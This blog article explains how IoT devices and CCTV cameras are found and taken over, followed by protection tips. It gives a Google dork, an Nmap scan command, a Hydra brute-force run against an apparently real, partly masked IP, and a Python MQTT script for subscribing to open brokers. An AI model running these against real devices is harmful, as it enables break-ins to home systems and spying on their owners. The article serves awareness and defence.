The era of the 5G has emerged and all devices tend to be connected on the world wide web. More and more online devices are now exposed to malicious users. CCTV cameras are the most targeted devices so far, but the new hacking trends focus on home IoT devices.
This article will reveal how hackers are able to spy on people’s everyday life, open thermostats, lights and garage doors remotely. Then, it will explain ways of protection against hacker’s attacks. Finally, a video is shared on how 20 devices IoT were hacked.
Hacking IoT devices is totally illegal. Do not try any of the described methods without permission. This article is only for education purpose. Forknerds is not responsible for any crime. Aim of the article is to raise awareness relative to IoT and CCTV cameras security.
Hackers’ IoT Targets
The most common devices that are targeted by hackers are the following :
- Wireless cameras (CCTV)
- Wireless printers
- Wireless NAS and routers
- Baby monitors
- Smart home assistants
- Smart thermostats
- Smart door locks
- Doorbell cam
- Smart light switches
- Smart smoke alarms
- Fitness devices
- Health devices
What exactly is IoT (Internet of Things)?
According to Wikipedia, the Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
In simple terms, IoT is when all devices are connected to the internet. The size is irrelevant, it can be a smartwatch or an expensive super-car.
However, there are a lot of concerns about the dangers of the vast adaptation of IoT.
How to find CCTV cameras and IoT Devices
Detecting devices with Google dorks
Search engines use thousands of spider-bots to search, crawl and index the whole internet in a few minutes. During this process, spides bots might encounter and index web servers that belong to IoT devices or CCTV cameras. Specially crafted google dorks are able to reveal IoT devices.
The easiest way to find IoT google dorks is at Google Hacking Database were there is a category called “Various online Devices”. I have collected some of the most interesting Google dorks per device :
- Thermostat: intitle:”Status & Control” + “Thermostat Status”
IoT & CCTV Network Scanners
Almost all IoT devices run services on the TCP/IP stack that can be detected by network scanners.
Nmap is an open-source software that is used to discover and audit network nodes.
Nmap has countless functionalities that help hackers to detect open ports, what services are being run and the operating system being used. Moreover, it can identify if a target is hidden behind a firewall.
Each IoT device or CCTV camera runs on different port and using a different deamon. It is not an easy task to create a Nmap command that will enumerate all available devices.
My proposed ultra-fast Nmap command to enumerate a vast majority of IoT devices and CCTV cameras is the following :
nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 80,8080,8081,8082,8083,9550 Explanation of the flags : -T5 : Timing Template (higher is faster) --min-parallelism/max-parallelism <numprobes>: Probe parallelization --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies --open: Only show open (or possibly open) ports -sV: Probe open ports to determine service/version info -p <port ranges>: Most common port of IoT devices
The results are really interesting and even by scanning a small subnet, we were able to detect media servers, DSL routers, and webcams.
PORT STATE SERVICE VERSION 80/tcp open http Hikvision DVR web UI Service Info: Device: media device PORT STATE SERVICE VERSION 80/tcp open http TP-LINK embedded httpd PORT STATE SERVICE VERSION 80/tcp open http nginx PORT STATE SERVICE VERSION 8080/tcp open http Hikvision Network Video Recorder http admin Service Info: Device: webcam PORT STATE SERVICE VERSION 80/tcp open http 1 service unrecognized despite returning data.
We identified manually all of the unrecognized services and lead to new webcam login GUI.
Computers Search Engines
These search engines lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described them as a search engine of service banners, which are metadata that the server sends back to the client.
Shodan is a very powerful tool that should be used with extreme caution. In a single query we can find thousands of cameras IPs :
Computer search engines indexes pretty much everything :
- Water treatment facilities
- Medical Devices
- Traffic lights
- Wind turbines
- Smart TVs
- Media Servers
- Everything with a public IP
All these engines have online APIs which can be used to automate and fasten the enumeration. They support filters that target specific ports, OS, protocols or specific banner strings.
In general, IoT exploitation can be divided into two big categories: remote and physical. In this article, we will present remotely exploitation methods. If you are interested in local exploitation, I suggest checking the video at the end of the article.
Zero Exploitation Effort
Countless IoT devices and web-cameras are misconfigured as a result, credentials are not required to access their control panel. As soon as, you find the IoT IP, you are already in.
Hacking finds even unprotected Puppycams!
Brute Force administrator panel
Many discovered IoT devices have password-protected administration panel like the following thermostat :
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible. It is considered a “classic” hacking tool as it exists over a decade. It can crack IoT device easily via bruteforce as shown below :
root@kali ~# hydra -t 10 -I -C passwords.txt 73.110.xx.xx -s 84 http-get "/index.shtml" Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-30 19:53:32 [DATA] max 10 tasks per 1 server, overall 10 tasks, 49 login tries, ~5 tries per task [DATA] attacking http-get://73.110.xx.xx:84//index.shtml [http-get] host: 73.110.xx.xx login: admin password: xxxx 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-30 19:54:21
-t TASKS run TASKS number of connects in parallel per target
-C FILE colon-separated “login:pass” format, instead of -L/-P options
-I ignore an existing restore file (don’t wait 10 seconds)
http-get attack method for basic HTTP authentication
-s PORT if the service is on a different default port, define it here
Always use Complex Passwords!
Hacking IoT with MQTT
According to Wikipedia, MQTT is an open OASIS and ISO standard lightweight, publish-subscribe network protocol that transports messages between devices. It is designed for connections with remote locations where a “small code footprint” is required or the network bandwidth is limited.
MQTT architecture consists of clients and brokers. The broker is the node that receives all the messages from the clients and then routes the messages to the subscribed clients. The nodes that send information to the connected brokers are called publishers, the broker is responsible to forward the data to the subscribed clients.
As we are already mentioned, it is easy to locate MQTT brokers on the wild via network scanners like
$nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 1883 <ip>
As soon as you locate a passwordless broker, you can connect and subscribe to all topics by using an MQTT client. A client can be created even by a python script using paho-mqtt library.
import paho.mqtt.client as mqtt def on_connect(client, userdata, flags, rc): print("Connected with result code "+str(rc)) client.subscribe("$SYS/#") def on_message(client, userdata, msg): print(msg.topic+" "+str(msg.payload)) client = mqtt.Client() client.on_connect = on_connect client.on_message = on_message client.connect("<Broker IP>", 1883, 60) client.loop_forever()
In my case, I will use my favorite MQTT client called MQTT Explorer to connect to one of the discovered brokers. My client will automatically subscribe to all available topics. MQTT topics are a form of addressing that allows MQTT clients to share information and they have a hierarchy as shown below.
The leaves of each topic consist of data produced by the sensors-devices like humidity, motion, battery, etc. It is clear that a passwordless broker is a high-security breach but this can go even worse. MQTT protocol supports message payloads to update the status of a remote device. For example, we are able to switch on the garage lights remotely by publishing a relevant request. The options are countless.
Hackers can easily control all Iot devices via an unprotected MQTT brokers.
Video: How to hack 20 devices in 45 minutes
How to protect your IoT devices
There is not a golden bullet when it comes to IoT protection. The following list summarizes the most important ways to protect your IoT devices.
- Always buy IoT brands that focus on security and release regularly updates
- Keep your IoT device firmware and software up to date
- Enable authentication of all administrator panels
- Enable encryption for MQTT connections
- Enable two-factor authentication if it is supported by your device
- Always use huge and complex passwords
- Do not use the default ports of the application
- Do not use default usernames and passwords
- Disable features that you do not need
- Do not publish internal servers on the internet
- Use VPN to hide your servers
Security is a big challenge to IoT and CCTV cameras. Cyber attacks will be increased and they may focus on smaller devices. Personal freedom is at risk as attackers can reach you inside your house. Security professionals must understand new technology challenges. As time passes and new technologies emerge, new attack vectors will be found and will be exploited by hackers.